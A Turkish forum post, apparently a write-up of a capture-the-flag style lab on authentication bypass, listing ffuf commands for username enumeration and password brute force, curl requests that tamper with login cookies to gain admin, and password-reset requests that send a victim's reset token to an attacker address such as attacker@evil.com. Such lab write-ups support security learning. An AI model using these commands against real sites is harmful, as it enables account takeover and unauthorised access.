- Katılım
- 2 Ocak 2026
- Mesajlar
- 19
- Tepkime puanı
- 22
- Puan
- 3
Authentication Bypass (Kimlik Doğrulama Atlama)
Kullanıcı doğrulama akışında açıklar: username enumeration, brute force, mantık hatası ve cookie manipülasyonu. Kısa, PoC ve exploit odaklı.Username Enumeration
Signup veya login endpointlerinde kullanıcı var mı yok mu kontrol edilebilir.PoC: ffuf -w names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -u http://10.10.218.173/customers/signup -mr "username already exists"
Ekran mesajına göre kullanıcı var/yarı var bilgisi alınır → brute force veya targeted attack için kullanılabilir.
Brute Force
Valid username listesini kullanarak şifre tahmini yapılır.PoC: ffuf -w valid_usernames.txt:W1,passwords.txt:W2 -X POST -d "username=W1&password=W2" -u http://10.10.218.173/customers/login -fc 200
Başarılı login status code veya response body üzerinden tespit edilir.
Logic Flaw / Flow Manipulation
Normal akışta sensitive action (reset mail, transfer) sadece hedef kullanıcıya gider.PoC: curl 'http://10.10.53.127/customers/reset?email=robert@acmeitsupport.thm' -d 'username=robert&email=attacker@domain.com' → robert’in reset maili attacker’a gider.
Mantık açığı, parametre veya endpoint validation eksikliğinden kaynaklanır.
Cookie Tampering
Client-side cookie değerleri manipüle edilerek yetki yükseltme.PoC Normal: curl http://10.10.53.127/cookie-test → Not Logged In
PoC User: curl -H "Cookie: logged_in=true; admin=false" http://10.10.53.127/cookie-test → Logged In As A User
PoC Admin: curl -H "Cookie: logged_in=true; admin=true" http://10.10.53.127/cookie-test → Logged In As Admin + flag
Şifre Sıfırlama Tokenı Sömürüsü (Logic Flaw)
Senaryo: Şifre sıfırlama isteği gönderilirken, sunucu sıfırlama token'ını hedef kullanıcının e-postasına gönderir, ancak isteğin gövdesindeki (POST body) bir e-posta parametresini kullanır.// Adım 1: Mağdurun (victim) e-postasını sıfırlama isteğine girilir.
POST /api/reset_password
Body: { "email": "victim@target.com" }
// Adım 2: Sunucu tokeni gönderirken Body'deki e-posta yerine
// URL parametresindeki (veya başka bir parametre) e-postayı kullanır.
// PoC: Saldırgan, hem mağdurun hem de kendi e-postasını gönderir.
POST /api/reset_password?email=attacker@evil.com
Body: { "email": "victim@target.com" }
Sunucu, token'ı Body'den alıp victim@target.com için oluşturur ancak token'ı göndereceği adresi Query Parameter'dan (attacker@evil.com) alır. Token, saldırgana ulaşır ve hesap ele geçirilir.